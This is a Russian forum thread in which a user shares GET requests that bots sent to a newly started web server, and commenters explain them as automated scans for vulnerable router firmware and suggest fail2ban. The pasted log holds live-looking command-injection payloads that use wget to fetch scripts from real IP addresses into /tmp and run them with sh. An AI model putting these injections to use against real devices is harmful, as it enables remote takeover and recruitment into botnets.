Долбит нормально!

1

1

GET запросы на простейший веб сервер за сутки(от поднятия)

/shell?cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
/login.cgi?cli=aa aa';wget http://46.166.185.42/e -O -> /tmp/hk;sh /tmp/hk'$
/login.cgi?cli=aa aa';wget http://199.195.254.118/dlink -O -> /tmp/xd;sh /tmp/xd'$

http://5.188.210.12/echo.php
http://httpheader.net/

/manager/html
/admin/assets/js/views/login.js

шо им надо lul

Ссылка

←	Где разыскать разработчиков

Сотовые операторы отменят плату за входящие звонки в роуминге по России

→

простенькие боты ищут уязвимости

WindowsXP ★★
(06.08.18 17:59:38 MSK)

Ссылка

Небольшой собственный опыт. После создания сервера, его через несколько минут уже начинают долбить. В моем случае это были миллионы попыток сбрутить пароль к шеллу. Это далеко не один сервер.

~~ozz_is_here~~ ★
(06.08.18 18:03:19 MSK)

Ответ на: комментарий от ozz_is_here 06.08.18 18:03:19 MSK

они долбят в 404 без остановки, конечно пока не сотни запросов в сек, а всего пару в минуту

но блин тамже 404, че они в холостую то

~~missxu~~
(06.08.18 18:05:25 MSK) автор топика

Ответ на: комментарий от missxu 06.08.18 18:05:25 MSK

Проверяют на уязвимости. У нас вон в Казахстане у еГовна можно было вытащить системные файлы например https://habr.com/post/347842/

~~ozz_is_here~~ ★
(06.08.18 18:07:22 MSK)

Ссылка

Ответ на: комментарий от missxu 06.08.18 18:05:25 MSK

Предлагаешь каждой ноде в ботнете еще и обмениваться инфой где какая страница что ответила? Им же нужно дыру найти, другие результаты их не интересуют.

Ставлю fail2ban одним из первых пакетов на новой виртуалке просто чтоб вот это все в логи не гадило.

micronekodesu ★★★
(06.08.18 18:08:27 MSK)

Ссылка

Ответ на: комментарий от missxu 06.08.18 18:05:25 MSK

404 - not found, ищем следующий.
просто не отвечай им

dib2 ★★★★★
(06.08.18 18:24:48 MSK)

Ссылка

тупые боты ищут дырки.

странно что не смотрят .svn/ и подобные - их «web-masters» частенько оставляют от мега-ума

MKuznetsov ★★★★★
(06.08.18 18:36:11 MSK)

Ответ на: комментарий от MKuznetsov 06.08.18 18:36:11 MSK

странно что не смотрят .svn/ и подобные - их «web-masters» частенько оставляют от мега-ума

Живым хакерам может и интересно было бы, а ботам оно зачем, не станут же они ковыряться в коде сайта. А чтобы туда еще и писать можно было любому из интернета, думаю не настолько все же вебмастера мегаумные.

praseodim ★★★★★
(06.08.18 18:49:39 MSK)

Ответ на: комментарий от praseodim 06.08.18 18:49:39 MSK

судя по топику - ищут кривые аппаратные прошивки на которых заюзать прокси. Это просто по первости, как только ip засветился или засканен, потому что самое простое и быстрое. easy-money :-) дальше будет хуже 100%

MKuznetsov ★★★★★
(06.08.18 18:54:03 MSK)